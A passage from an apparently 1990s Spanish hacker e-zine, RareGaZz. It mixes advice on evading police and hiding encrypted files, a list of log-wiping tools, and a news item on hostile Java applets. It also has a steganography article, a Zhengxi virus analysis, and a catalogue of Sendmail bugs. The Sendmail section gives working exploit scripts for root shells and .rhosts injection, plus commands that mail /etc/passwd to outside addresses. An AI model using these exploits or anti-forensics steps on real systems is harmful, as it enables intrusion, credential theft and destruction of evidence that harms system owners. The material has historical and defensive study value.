 La mejor cosa es esperar por lo menos 1 o 2 meses sin hacer nada. Avisa a
 tus amigos que no envien correo, si el correo que recibes esta encriptado
 con PGP solo alertaras a los administradores.
 Recuerda encriptar toda tu informacion sensitiva y remover todos los papeles
 con informacion sobre cuentas, numeros telefonicos, etc. Esas son las cosas
 mas importantes que los administradores y policias buscaran cuando entren a
 tu casa.

      VI. DETENIDO
     ----------------------------------------------------------------------

 Ahora hablaremos de las cosas que debes y no debes hacer cuando la policia
 te visite. Hay dos cosas *muy* importantes que debes hacer:
 1)  OBTEN UN ABOGADO INMEDIATAMENTE !
    El abogado debe llamar al juez y apelar a la orden de cateo. Esto no
    ayuda mucho pero puede interrumpir su trabajo. El abogado debe decirte
    todo lo que los policias tienen derecho a hacer y que no.
    El abogado debe escribir una carta a el juez solicitando las computadoras
    que te hayan sido confiscadas de regreso tan rapido como sea posible
    por tu necesidad urgente de hacer negocios, etc.

  2)  NUNCA HABLES CON LOS POLICIAS !
    Los policias no pueden prometerte nada. Si te dicen que saldras del
    problema si hablas no confies! Solo el juez tiene el poder de hacer esto.
    Los policias solo quieren que les digas informacion que pueda ser usada
    en contra tuya.
    Siempre deberas negarte a ofrecer evidencia (passwords,etc) y diles que
    hablen contigo a traves de tu abogado.


 Entonces debes hacer un plan con tu abogado para salir del problema sin
 dao o reducirlo.

 POR FAVOR! ten en cuenta esto: no traiciones a tus amigos. No les digas
 ningun secreto.
 Si lo haces sera un boomerang: tus ex-amigos se enojaran y se vengaran,
 y aquellos que seran atrapados por tu culpa tambien hablaran ... y daran
 a la policia mas informacion acerca de *tus* crimenes.

 Pregunta si en tu pais pueden forzarte a abrir tu caja fuerte, si este es el
 caso entonces debes negar tener archivos encriptados.


     VII. PROGRAMAS
     ----------------------------------------------------------------------

 Esta es una pequea lista de los programas que deberas obtener y usar.
 No preguntes donde puedes conseguirlos, necesitas encontrarlos.

 Primero un pequeo Glosario:

         Cambiar - Cambiar campos del archivo de registro por lo que quieras.
         Borrar  - Elimina las entradas que desees.
         Editar  - Un editor para el archivo de registro.
  Sobre-Escribir - Sobre-escribe las entradas con valores de zero bytes.

                          Modificadores de Registro
                          ~~~~~~~~~~~~~~~~~~~~~~~~~
     ah-1_0b.tar  Cambia las entradas de los programas de auditoria.
     clear.c      Borra las entradas en utmp, wtmp, lastlog y wtmpx
     cloak2.c     Cambia las entradas en utmp, wtmp y lastlog
     invisible.c  Sobre-escribe utmp, wtmp y lastlog con valores predefinidos,
                  asi que es mejor que zap.
     marryv11.c   Edita utmp, wtmp, lastlog e informacion de auditoria -Mejor!
     wzap.c       Borra las entradas en wtmp
     wtmped.c     Borra las entradas en wtmp
     zap.c        Sobre-escribe utmp, wtmp, lastlog - Puede ser detectado!

           Por: CrackSmoker -Lider actual del grupo RdK-
          Para: RareGaZz

..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..
========================================
[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]


                                  POISON JAVA
                                  ~~~~~~~~~~~

Sun Microsystems' le ha declarado la guerra a los applets java en Internet que
producen daos o consumen demasiados recursos de un sistema intencionalmente.
Este es el mensaje por parte de SUN en respuesta a una intensa investigacion
acerca de la seguridad de Java.

Las investigaciones se realizaron despues de que academicos, cientificos y
hackers anunciaron que algunos applets bajados del WWW presentaban graves
peligros de seguridad para los usuarios. Los applets Poison Java son hostiles,
y maliciosas trampas creados para 'husmear' en la computadora ajena usando
java como su tecnologia.

Un grupo de cientificos de la universidad de Princeton, publicaron un articulo
donde declaran "El sistema Java en su forma actual no podra asegurarse
facilmente."

Mas pruebas de los investigadores revelaron que surfeadores inocentes en la
red que 'bajaban' applets java en Netscape Navigator y el navegador de Sun
HotJava, se arriesgan a encontrar applets hostiles que interfieran con sus
computadoras (consumiendo RAM y ciclos CPU). Tambien fue descubierto que los
applets podian conectar a una tercera persona a Internet y que sin el
conocimiento de esta 'subir' informacion sensitiva de la computadora del
usuario. Hasta las mas sofisticadas 'barreras de fuego' (firewalls) pueden
ser penetradas . . . "por que el ataque es lanzado detras de la barrera,"
dijeron los cientificos.

Un lector dijo, "No tenia idea de que era posible encontrar websites que
lanzaran un ataque al navegador." Otro dijo, "Si se permite que esto se salga
de control la gente empezara a retirarse de la red."
                      [ Menos gente, mas velocidad :-) ]


Una recomendacion de los cientificos es que apaguen el poder de ejecutar
applets java en sus navegadores. Los investigadores sienten que SUN y Netscape
deben de aclarar los temas sobre seguridad respecto a Java.

Los investigadores entrevistaron al guru de securidad JavaSoft, Ms. Marianne
Mueller, quien dijo "estamos tomando la seguridad muy en cuenta y trabajamos
muy duro para solucionar esos problemas." Mueller dijo que Java necesita ser
re-escrito desde el principio. " El hecho de crear una 'caja de arena' donde
los applets puedan ejecutarse sin salirse es algo duro..."

La solucion hasta el momento es crear una caja de arena que avise al usuario
cuando un applet trate de salirse de ella. El usuario asi, podra seleccionar
continuar si se encuentra en un sitio de confianza o cancelar.

"Podemos poner mecanismos en lugar para que la interfaz del usuario pudiera
ver lo que un applet esta haciendo en su sistema de una manera amigable para
que asi pudieran ser en determinado caso, apagados los applets. Desde luego,
esto solo sirve si el applet no ha 'matado' todos los recursos."

Los expertos no creen que el problema de los applets poison o black widows se
solucione pronto, de hecho, se espera empeore. Los hackers creen que cuando
Microsoft saque al mercado la nueva version de Internet Explorer con soporte
para Java, Visual Basic scripts y aada poder a la tecnologia ActiveX, los
problemas de seguridad empeoraran.

"Esta es una oportunidad de abusar, y se esta convirtiendo en un enorme
problema," dice Stephen Cobb, director de los proyectos especiales de la
asociacion nacional de seguridad informatica (NCSA). "Por ejemplo, la
tecnologia OLE de Microsoft ActiveX tiene un acceso mucho mas profundo en un
sistema que Java."

..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..
========================================
[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]

                          
                            Algunos Bugs de Sendmail
                          

                             Por: Psycho Tranze
                            Para: RareGaZz

 Esta informacion fue recopilada de distintas fuentes en Internet y ha
 sido organizada con el proposito de tener una referencia de los hoyos en
 la seguridad del sistema unix en especial Sendmail.

-----------------------------------------------------------------
   BUG                        Version de Sendmail
-----------------------------------------------------------------
= WIZ =                        *Vieja*
= DEBUG =                      *Vieja*
= TURN =                       *Vieja*
= OVERFLOW INPUT BUFFER =      *Vieja*
= DECODE ALIAS =               *?????*
= -oR SunOS =                  *SunOS-sendmailV5.22*
= -oM =                        *8lgm6Dec1994-SMI-Sendmail(sm basado en SunOS)*
= Sobre escribir archivos =    *Arreglado en 5.59*
= -oQ =                        *?????*
= |PROGRAM =                   *Probado en 5.55*

= WIZ =          *Vieja*

   El mas viejo y facil agujero en sendmail es la puerta trasera 'wiz', y
   ahora es muy dificil de encontrar. En la conexion solo escribe 'wiz' y
   despues 'SHELL', y ya estaras en una shell root.

   [ puede configurarse en el archivo sendmail.cf ... Opcion 'OW'
   inmediatamente seguido de el password encriptado ]


= DEBUG =        *Vieja*

 Este bug fue usado por el gusano de internet escrito por Robert T. Morris Jr.
 Este exploit permite a cualquiera ejecutar un programa en una maquina remota.
 Simplemente consiste en dar el comando 'debug', usar una pipe a /bin/sh como
 recipiente y alimentar los datos con los comandos que quieras ejecutar en
 la maquina remota.

 [ Si el servidor sendmail contesta con "200 Debug set" a el comando 'debug'
   existe la oportunidad de que el bug este presente. ]

Ejemplo:

#!/bin/sh
telnet << EOF
open victima.com.mx 25
debug
mail from: </dev/null>
rcpt to: <\"|sed -e '1,/^$/'d | /bin/sh ; exit 0\">
data

cp /bin/sh /tmp/sushi          # o como alternativa:
chmod 4755 /tmp/sushi          # echo "+ +" >> /.rhosts
.
EOF



= TURN =                          *Vieja*

 El comando TURN permite robar el correo ...

 [ Muy viejo bug ]

= OVERFLOW INPUT BUFFER =         *Vieja*

 Causa que el daemon de sendmail se estrelle ...

 [ Muy viejo, solo para la coleccion ;) ]

= DECODE ALIAS =                  *?????*

 Si '/etc/aliases' contiene "|/usr/bin/uudecode" cualquiera puede enviar
 correo a decode, escribir a cualquier archivo perteneciente a daemon, si
 pueden conectarse a el sendmail daemon, pueden escribir a los archivos de
 cualquier usuario.

 Para probar la existencia de el alias decode desde una conexion sendmail:

% telnet victima.com.mx 25
Trying 127.127.127.127
Connected to target.com
Escape character is '^]'.
220 victima.com.mx Sendmail Sendmail 5.55/victim ready at Fri, 6 Nov 93 18:00 PDT
expn decode
250 <"|/usr/bin/uudecode">
quit

/\/ 1er Exploit \/\:
% echo "mi-servidor.com" | uuencode /usr/bin/.rhosts | mail decode@victima.com.mx

/\/ 2do Exploit \/\:

% cat > outfile                  # Creamos nuestro propio .rhosts
+ +
^C
% uuencode outfile /usr/bin/.rhosts
begin 644 /bin/.rhosts
$*R'K"O\

% telnet victima.com.mx 25
220 victima.com.mx SunOS Sendmail 8.6.1 #5 ready at Fri, 13 May 99 00:00 (EST)
VRFY decode
250 <|/usr/bin/uudecode>
MAIL FROM: bin
250 <bin> ... Sender Okay
RCPT TO: decode
250 <decode> ... Recipient Okay
DATA
354 Enter mail, end with "." on a line by itself
begin 644 /bin/.rhosts
$*R'K"O\                       # Es solo "+ +" uuencoded

end
.
250 Mail accepted
quit
221 victima.com.mx closing connection
Connection closed by foreign host.
% rlogin victima.com.mx -l bin
$


 Si no hay directorios conocidos o que se puedan escribir, una interesante
 variacion es crear un archivos bogus /etc/aliases.pag que contenga un alias
 con un comando que quieras ejecutar en tu objetivo. Esto puede funcionar
 ya que en muchos sistemas los archivos aliases.pag y aliases.dir, que
 controlan los alias del sistema no estan protegidos.

 evil % cat decode
 bin: "| cat /etc/passwd | mail raregazz@bigfoot.com"
 evil % newaliases -oQ/tmp -oA`pwd`/decode
 evil % uuencode decode.pag /etc/aliases.pag | mail decode@victima.com.mx
 evil % /usr/lib/sendmail -fbin -om -oi bin@victima.com.mx < /dev/null


= -oR SunOS =             *SunOS-4.1.X-sendmailV5.22*

 La opcion -oR usa popen() para regresar el correo que no pueda ser entregado.
 El impacto de este bug es que usuarios locales pueden obtener privilegios
 de R00T!

-------------------------- ropt.sh ---------------------------------------

#!/bin/sh
#
# Syntax: roption servidor
#
# servidor es cualquier sisteme corriendo sendmail (excepto el host local).
#
# Este programa explota un error en SunOS sendmail(8) y trata de crear un
# root shell suid.
#
# Pon atencion al script, algunas cosas hay que modificarlas para que se
# adapte al sistema en que lo ejecutas, por ejemplo el directorio temporal.
#
# Written 1995 by [8LGM]
# Please do not use this script without permission. <-- Jah!
#

PROG="`basename $0`"
PATH=/usr/ucb:/usr/bin:/bin      export PATH
IFS=" "                          export IFS

# Check args
if [ $# -ne 1 ]; then
        echo "Syntax: $PROG host"
        exit 1
fi

# Check we're on SunOS
if [ "x`uname -s`" != "xSunOS" ]; then
        echo "Sorry, this only works on SunOS"
        exit 1
fi

PROG="`basename $0`"

EXECME=/tmp/HotterThanMojaveInMyHeart

# Create EXECME.c

cat > $EXECME.c << 'EOF'
main(argc,argv)
int argc;
char *argv[];
{
        chown("/tmp/InfamousAngel", 0, 0);
        chmod("/tmp/InfamousAngel", 04755);
}
EOF

cc -o $EXECME $EXECME.c

# Check we have EXECME

if [ ! -x $EXECME ]; then
        echo "$PROG: couldnt compile $EXECME.c - check it out"
        exit 1
fi

/bin/cp /bin/sh /tmp/InfamousAngel
# Run sendmail

/usr/lib/sendmail -oR$1 -f";$EXECME;" -t << 'EOF'
To: No1InParticular

Hows it goin
EOF

exec /tmp/InfamousAngel

................................Corta..Aqui..................................


= -oM =                   *8lgm6Dec1994-SMI-Sendmail(based on SunOS sm)*

 El sendmail de Sun permite la opcion -oM para crear cualquier macro, y aun
 retiene el privilegio root. (La lista de macros 'confiados' -trusted- debe
 ser limitada)

 Los sendmails afectados son "SunOS 4.x Sendmail - y la ultima version de
 diciembre de 1994.

 EXPLOIT:

        1. Crea el archivo sunsendmailcp
------------------------corta aqui----------------------------
#!/bin/sh
#
# sunsendmailcp remitente destino

if [ $# -ne 2 ]; then
        echo usage: `basename $0` from to
        exit 1
fi

rm -f /usr/tmp/dead.letter
if [ -f /usr/tmp/dead.letter ]; then
        echo sorry, cant continue - /usr/tmp/dead.letter exists
fi

if [ ! -r $1 ]; then
        echo $1 doesnt exist or is unreadable
        exit 1
fi

ln -s $2 /usr/tmp/dead.letter
/usr/lib/sendmail -L0 '-oM#anything' $USER < $1
rm /usr/tmp/dead.letter
exit 0
------------------------corta aqui----------------------------

        2. Ejecuta el comando

           % ./sunsendmailcp archivofuente archivodestino

           y el archivo destino sera creado o si existe sera continuado.

= Sobre escribe archivos =     *Arreglado en 5.59*

 Usuarios remotos pueden escribir en cualquier archivo que NO tenga privilegio
 de root.

 telnet victima.com 25
 rcpt to: /home/zen/.rhosts
 mail from: zen
 data
 cualquier cosa
 .
 rcpt to: /home/zen/.rhosts
 mail from: zen
 data
 + +
 .
 quit

% rlogin victima.com -l zen
  Welcome to victima.com!
victima %




= '-oQ' =                   *?????*

 Este error involucra a las opciones '-q' y '-oQ' causando que cualquier
 archivo pueda ser borrado o leido.
 Debes crear un tipo de archivo 'qf' en el directorio /usr/spool/mqueue como
 este:

P28
T599831504
Dfilename
Suser
Ruser
H?P?return-path: <user>
H?F?from: user (User Name)
H?x?full-name: User Name
HTo: user
Hsubject: Gotcha

 despues que el comando 'sendmail -q -oQ' es ejecutado, el 'filename' es
 borrado y sus contenidos mandados a 'user'.

- - - -
 El 'oQ' usa la opcion Q que escoge en que directorio poner los mensajes
 marcados para futuro envio.
 La opcion 'q' hace que daemon procese los mensajes en espera.
- - - -



= '|PROGRAM ' =     *Probado en 5.55*

 Cualquiera puede especificar comandos arbitrarios shells o paths para la
 direccion destino y/o remitente.

 Un ataque tipico para obtener el archivo de passwords es:

 % telnet victima.com 25
 Trying 123.456.789.0...
 Connected to victima.com
 Escape character is '^]'.
 220 victima.com Sendmail 5.55 ready at Mon, 12 Dec 93 23:51
 mail from: "|/bin/mail hacker@miservidor.com < /etc/passwd"
 250 "|/bin/mail hacker@miservidor.com < /etc/passwd"... Sender ok
 rcpt to: mickeymouse
 550 mickeymouse... User unknown
 data
 354 Enter mail, end with "." on a line by itself
 .
 250 Mail accepted
 quit
 Connection closed by foreign host.
 %

 [Psycho Tranze nos prometio algunos mas nuevos para el siguiente numero :-)]

..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..
========================================
[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]

 
                               IMPLEMENTACIONES
                          -=        DE  LA       =-
                                ESTEGANOGRAFIA

 Para aquellos que no sepan, la esteganografia (steganography) es una tecnica
 cryptografica que simplemente esconde mensajes dentro de mensajes. El
 remitente crea un mensaje nada sospechoso y despues, usando una de muchas
 tacticas, inyecta el mensaje secreto dentro de el. Algunas tecnicas son:
 Tintas invisibles, distorcion de caracteres, diferencias de escritura,
 cambiado de bits, etc... El metodo especificado en este articulo es una
 bien conocida implementacion esteganografica, nivel bajo de cambio de bits
 en imagenes graficas.

 Esteganografia es una tecnica para esconder datos en otros datos. El metodo
 general es cambiar bits para que leyendo el nuvel bajo de cada 8 bytes se
 obtenga un caracter. Esto permite a uno usar un archivo de imagen o sonido
 para esconder archivos, resultando en un pequeo bit de ruido que pasa des-
 apercibido y en un archivo de datos guardado que luego podra ser extraido.
 Este papel describe un metodo para esconder archivos mas seguro, el metodo
 se llama dispersion pseudo-al hazar (pseudo-random dispersion).

 Ordinariamente, si alguien sospecha que tienes archivos de datos escondidos,
 digamos en un GIF solo tendrian que ejecutar el extractor apropiado y
 encontrar los datos. Si los datos no estan encriptados, estara el archivo
 'desnudo' para que cualquiera lo vea.
 Esto puede ser aminorado usando una proteccion simple de password,escondiendo
 el password en el archivo GIF como encabezado, encriptandolo primero con el
 mismo. Si alguien no sabe el password, no podran extraer la informacion. Esto
 es desde luego razonablemente seguro, dependiendo en la encripcion usada, y
 lo recomiendo. Pero los archivos escondidos pueden estar mas seguros.

 La dispersion Pseudo-Hazar trabaja escondiendo un password, y una semilla de
 un generador de numeros aleatorios en el encabezado encriptado. Entonces,
 un generador aleatorio de bytes es pasado, antes de que los bytes en el
 nivel bajo sean cambiados.

 Para hacer esto, uno primero debe calcular cuantos bytes un bit puede ocupar
 por el mismo. Por ejemplo, para esconder un mensaje de 800 caracteres en un
 GIF significaria que cada caracter necesita 8 bytes (8 bits por caracter, 1
 byte por cada bit de orden bajo), asi que necesitarias 6,400 bytes de datos
 para esconder el mensaje en, 8 bytes por caracter. Digamos que tenemos un
 GIF que tiene por lo menos 10 veces este tamao: 64,000 bytes. Asi, tenemos
 80 bytes por caractero para esconder datos. Como cada bit toma un byte,
 tendriamos 10 bytes por cada bit para esconder datos! Asi pues, si tomamos
 un pseudo-generador aleatorio de numeros entre 1 y 10, y usamos ese byte para
 esconder nuestro bit de nivel bajo, hemos alcanzado dispersar un mensaje a
 traves del GIF en una forma aleatoria, mucho mas dificil de extraer.

 Una mejora puede hacerse a este algoritmo. Re-calculando el numero disponible
 de bytes en cada bit despues de que cada bit es escondido, los datos son
 dispersados mas parejo sobre el archivo, en lugar de amontonar los datos
 al principio, que seria una ocurrencia normal. Si usas un generador aleatorio
 de numeros, escogiendo numeros del 0-9, despues, los valores se normalizaran
 a 5.Esto ocasionaria que el mensaje escondido quedara amontonado al principio
 del GIF.Si recalculamos cada vez el numero disponible de bytes dispersariamos
 los datos por todo el archivo, con el extra bono de que los bits se dispersen
 mas aparte que los primeros, resultando en posibles espacios de busqueda de
 20, 32, 100, o hasta 1,000 posibles bytes por bit. Esto tambien sirve para
 hacer los datos mucho mas dificiles de extraer.

 Recomiendo tener un encabezado lo suficientemente largo como para un password
 de 8 caracteres ASCII, una semilla integral de numeros aleatorios, un numero
 integral de version, y un lugar en blanco para futuros usos. El numero de
 version nos permite compatibilizar con previas versiones de el programa. El
 encabezado debe estar encriptado y sin dispersar.

 Es util hacer el extractor de una manera que siempre extraiga algo, sin
 importar que el password sea el correcto o no. Hacer esto significa que es
 imposible saber si has adivinado un password correcto y has obtenido los
 datos o solo basura que parecen datos encriptados. El uso de un password
 puede ser opcional. Un simple default password puede ser usado en estos
 casos. Cuando escondas datos encriptados, no hay diferencia para el ojo
 simple entre basura o datos, asi que el password no es extrictamente
 necesario. Esto significa que no tendras que memorizar ningun password,
 o transmitirlo a otras personas.

..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..
========================================
[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]

                          
                          El padre de todos los virus
                          

                                 Primera Parte

 El virus Zhengxi es un virus parasitico, residente, infecto de ficheros EXE y
 OBJ, polimorfico y stealth. Ademas, inserta droppers en formato COM en los
 ficheros ZIP, ARJ y RAR, ademas de los EXE self-extracting.
 Su tamao es de tan solo 7k, y se trata de un virus muy complejo,
 probablemente el virus mas complejo que existe. Infecta ficheros EXE, y lo
 hace de dos formas: o bien de forma parasitica (es decir, modificando la
 cabecera y escribiendo su codigo al final del fichero) o bien, tras haber
 encontrado subrutinas de tipo C o Pascal en el fichero, sobreescribiendo una
 rutina del mismo tipo con un cargador del virus, y escribiendo la rutina
 original y el cuerpo encriptado del virus al final.
 Tambien, como dijimos, inserta su codigo en los ficheros OBJ. Los ficheros
 OBJ son creados por el compilador de ensamblador TASM y necesitan ser
 linkados con el programa Link que compila estos ficheros y los convierte en
 ejecutables. Cuando estos archivos son linkados se convierten en ficheros EXE
 infectados.
 Por ultimo, el virus tambien introduce droppers en formato COM en los
 ficheros comprimidos con ZIP, ARJ o RAR usando rutinas internas de
 descompresion.
 Asi pues, tenemos que el virus usa cuatro tipos de infeccion: EXE appending,
 EXE inserting, OBJ, y droppers COM. Parece como si pretendiese ser, y de
 hecho lo es, un "todo en uno", recogiendo en su codigo diversas ideas que
 aparecieron previamente en otros virus: Infeccion de OBJ (del virus Shifting
 Objective, de Stormbringer), de ficheros comprimidos (como el virus
 Dementia), y de EXE con rutinas tipo C o Pascal (del tipos Lucretia).

 La rutina de desencriptado es mas compleja que la de Eugene Kaspersky y, con
 toda probabilidad, el resto del mundo no ha visto rutinas tan complejas que
 las que se pueden ver observando el codigo de un EXE infectado. Parece como
 si fuese una rutina generada por la engine SMEG, de Black Baron, pero muy
 mejorada y mil veces mas compleja (hay muchisimas llamadas a rutinas basura,
 funciones CP/M y de la int 21h, incluyendo llamadas directas a la tabla de
 vectores de interrupcion). Esta primera rutina de desencriptado nos descubre
 otra rutina mas (el virus esta encriptado con dos loops polimorficos
 complejisimos), que finalmente nos descubre el codigo virico. La suma total
 de la longitud de estas rutinas de desencriptado asciende a mas de 2k.
 Tras tracear durante horas a traves de estas subrutinas, montones de
 instrucciones basuras y llamadas a funciones del DOS, el cuerpo del virus
 aparece por fin desencriptado, y en el podemos apreciar las siguientes
 cadenas de texto: Abnormal program termination The virus/DOS 0.54 Copyright
 (c) 1995 Zhengxi Ltd Warning! This program for internal use only!

 El estilo en que esta escrito el codigo del virus es tan extremadamente
 complejo que resulta dificil encontrar el proposito de mas de cien de sus
 subrutinas, asi como de varios cientos de ramificaciones de las mismas. El
 virus usa dos tipos distintos de referencias para dirigirse a los mismos
 datos: El acceso directo a la direccion y el acceso indexado. A veces el
 virus usa la primera variante y a veces la segunda, e incluso los mejores
 desensambladores (Sourcer, IDA...) no pueden construir las tablas de
 referencia que nos resultan tan utiles de cara al analizar el codigo de un
 virus.
 El virus tambien usa ramificaciones "escondidas" y es muy dificil de
 encontrar la direccion destino de estas ramificaciones ya que hay varias
 combinaciones posibles.
 El virus presta especial atencion a varios ficheros, pero, a diferencia del
 resto de los virus que conocemos, no contiene sus nombres entre el codigo
 virico, sino que contiene palabras (2 bytes) CRC para cada uno de los
 nombres. Cuando se accede a un fichero, el virus calcula el CRC de cinco
 caracteres cualesquiera del nombre de dicho fichero, obteniendo asi una
 palabra CRC, que va comparando con las correspondientes a los ficheros que
 requieren una atencion especial por su parte, y que se encuentran entre el
 codigo virico, tambien en formato CRC. Asi, tenemos que el virus "empaqueta"
 cinco caracteres del nombre del fichero en tan solo 2 bytes de suma CRC. La
 rutina inversa a esta que usa el virus genera aproximadamente 25000 variantes
 de nombres posibles. El fichero resultante con todas estas combinaciones
 ocupa mas de 400k, con lo que nos podemos ir haciendo una idea de la
 complejidad del virus.
 El virus tiene almacenadas 16 palabras CRC, es decir, a fin de cuentas, 16
 nombres de ficheros a los que presta una atencion especial por distintos
 motivos. Ahora mismo hay 11 de esos 16 nombres encontrados, es decir, que se
 ha averiguado a que programa corresponden:

                             UUENC        UUENCODE
                             PKLIT        PKLITE
                             LZEXE        LZEXE.EXE
                             NDD.E        NDD.EXE
                             DIET.        DIET.EXE
                             AFD.E        AFD.EXE
                             SD.EX        SD.EXE
                             SPEED        SPEEDDSK.EXE
                             DEFRA        DEFRAG.EXE
                             TLINK        TLINK.EXE
                             LINK.        LINK.EXE

 Tras haber encontrado la mayor parte de los nombres, aun nos espera otro
 plato fuerte: el virus tambien usa CRCs para analizar la cabecera de los
 ficheros antes de infectarlos. El Zhengxi tiene una tabla que consta de ocho
 CRCs (y ya van 24 en total); el proceso de comprobacion de ficheros validos
 para infectar consiste en calcular la suma de los CRC de los cuatro primeros
 bytes de la cabecera y compararla con los CRCs de su tabla. Tras hacer esto,
 repite el proceso, disminuyendo el numero de bytes al calcular la cabecera
 hasta dos y uno.

 Con la rutina inversa encontramos muy rapido cuatro de las ocho variantes: la
 variante de un byte, de la cabecera OBJ (80h), dos variantes de dos bytes
 correspondientes a la cabecera EXE ("MZ" y "ZM"), y otra mas de dos bytes, la
 de los ficheros comprimidos con ARJ (60eah). El resto de las variantes era
 las de cabeceras de cuatro bytes, y aparecieron dos de ellas: la de ficheros
 ZIP (504b0304h), y la del RAR (Rar!). Las otras dos cabeceras que faltan de
 momento no estan identificadas. La primera de ellas parece corresponder a los
 ficheros generados por otro compresor, ya que la rutina que le da el control
 esta muy cerca de las rutinas de descompresion de ARJ, ZIP y RAR, ademas de
 usar las mismas subrutinas de infeccion que estas. Por estos mismos motivos,
 tambien parece ser que la octava y ultima variante que hace falta este
 relacionada con los ficheros de formato OBJ.
 Para encontrar estas variantes, la rutina inversa estuvo trabajando dos dias
 seguidos y sin interrupcion en un 486/66 MHZ. El resultado fue de nada mas y
 nada menos que 65000 variantes para cada suma CRC. Ademas, como los bytes
 estan "empaquetados" dentro de dos bytes CRC, la operacion inversa nos da
 65000 variantes de cada fuente de cuatro bytes. Los ficheros resultantes y
 correspondientes a cada suma CRC ocupaban mas de 1MB de longitud. Ni que
 decir tiene que las combinaciones posibles ascendian a mas de 260000
 (65000*4). A pesar de esto, ya conocemos seis de ocho.

 El codigo del virus recibe el control desde distintos puntos, dependiendo del
 modo de infeccion, perp de todas formas el destino siempre es la rutina
 polimorfica de desencriptado. En los ficheros EXE (appending) la rutina de
 desencriptado recibe el control inmediatamente cuando el EXE es cargado en
 memoria para ejecutarse; en los ficheros EXE (inserting) esta recibe el
 control del cargador del virus; en los ficheros OBJ compilados desde un call,
 y por ultimo en los droppers formato COM, la ejecucion comienza con un jmp,
 que salta directamente al desencriptado.
 Una vez desencriptado, la rutina de instalacion del virus recibe el control.
 Primero el virus mueve su codigo para asi alinearse por parrafos (16 bytes);
 engancha a la int 1 (traceo paso a paso), y tracea la int 21h.
 El virus llama a una funcion bastante inusual para hacerlo: la llamada 19h
 del CP/M (obtener unidad actual). Esta llamada le da el control al handler de
 la int 21h original del DOS tras haber ejecutado algunas instrucciones y
 entonces es cuando el virus empieza a tracear al codigo de la int 21h
 original.
 Al tracear este codigo, el handler es interrumpido tras cada instruccion
 ejecutada. El virus entonces recibe el control y calcula el CRC (una vez mas)
 de 12 bytes del codigo de la int 21h. Si el CRC es igual a una de dos
 posibles variantes, el virus parchea este codigo, y se instala residente en
 memoria.
 Es absolutamente imposible encontrar las variantes de codigo que busca el
 virus. Los 12 bytes de codigo estan empaquetados en 2 bytes de posibles
 variantes, la primera y la segunda. El resultado de la operacion inversa nos
 da mas de 2*10000000000h variantes de codigo...y no, no me he equivocado al
 poner la "h" despues del numero... no es un numero binario ni decimal, sino
 hexadecimal. Por tanto tenemos que el unico medio de investigacion consiste
 en probar diferentes DOSs en diferentos modos (alto o bajo), y mirar como ha
 parcheado el virus la int 21h.
 Por el momento solo se encontro una variante de codigo que parchea el virus,
 y que se corresponde con parte del handler de la int 21h del DOS 5.x/6.x; el
 dump hexadecimal es asi: 06 1E 55 57 56 52 51 53 50 8C D8 (push/push/../push/
 mov ax,ds)
 Si el virus encuentra este codigo, comprueba distintas condiciones antes de
 hacer el parcheo y termina su instalacion.

 La instalacion del virus consiste en reubicar el bloque de memoria del
 sistema usando las funciones del DOS ChangeMem y AllocateMem (int 21h,
 ah=4ah, 48h), dejando para la copia residente del virus, y entonces almacena
 en su codigo 11 bytes de la direccion del handler de la int 21h para luego
 parchear el codigo de esta int con un far call (2fh ffh 1eh ?? ??).
 Y cual es la direccion a la que apunta este far call? Cualquiera con un
 minimo de idea responderia que a su propio handler de la int 21h. Pues de eso
 nada. El destino es la direccion de la int 25h (absolute disk read).

 La siguiente sorpresa consiste en que el virus guarda los cincos primeros
 bytes del handler de la int 25h, y escribe alli cinco bytes nuevos, que
 conforman un far jmp al codigo virico. El resultado queda asi:

 El virus usa una "palabra magica", 06c7h, justo despues del call far a la
 direccion de la int 25h. En principio no parece haber otra razon para hacerlo
 que para ocultar el codigo desensamblado. El resultado de este parcheo es un
 codigo normal, sin comandos extraos.
 Por lo tanto el virus tiene el mismo handler para interceptar la int 21h y la
 int 25h. Para separar las llamadas a ambas ints, el virus chequea la
 direccion del programa que las llama (caller_ip); si la llamada va dirigida
 a la int 21h, el virus le pasa el control a la rutina del handler de la int
 21h propia. En otro caso, el que recibe el control es el handler que usa
 el virus para la int 25h.

 Por cierto, se habran dado cuenta que el virus no usa ningun chequeo de
 instalacion para evitar irse residente mas de una vez. La razon es simple, ya
 que antes de instalarse, el virus busca codigo especifico en el handler de la
 int 21h y lo modifica. Una vez instalado, ese codigo ya no estara presente,
 por lo que el virus no se re-instalara.
 La rutina de instalacion esta completa; el codigo virico esta copiado en un
 bloque de memoria del sistema y las ints 21h y 25h ya estan interceptadas.
 Pero aun falta por decir que el virus es capaz de mover su codigo a otros
 bloques de memoria (ver el analisis del handler de la int 21h). Por tanto
 la copia residente del virus no ocupa los mismos bloques de memoria del
 sistema, y puede moverse a otras direcciones incluyendo las del UMB.

 Una vez instalado, el virus retorna el control al fichero host. Este tiene
 tres metodos distintos de hacer dicho retorno, dependiendo del tipo de
 infeccion. En caso de haberse instalado desde el dropper COM, el virus
 se limita a ensear el siguiente mensaje:

 Continua en RareGaZz #5 <--- Parece novela...shit!

..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..
========================================
[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]

                           Ŀ
                                                  
                            Es Windows un Virus? 
                                                  
                           

 Pregunta a McAfee: Es Windows un Virus?
 No, Windows no es un virus. Esto es lo que hacen los virus:

 Ellos se replican rapidamente.
          -- Okay, Windows hace eso.
 Los virus toman recursos valuables haciendo mas lento el sistema.
          -- Okay, Windows hace eso.
 Los virus, de vez en vez, echaran a perder tu disco duro.
          -- Okay, Windows hace eso.
 Los virus son usualmente contenidos, sin saber el usuario, junto con
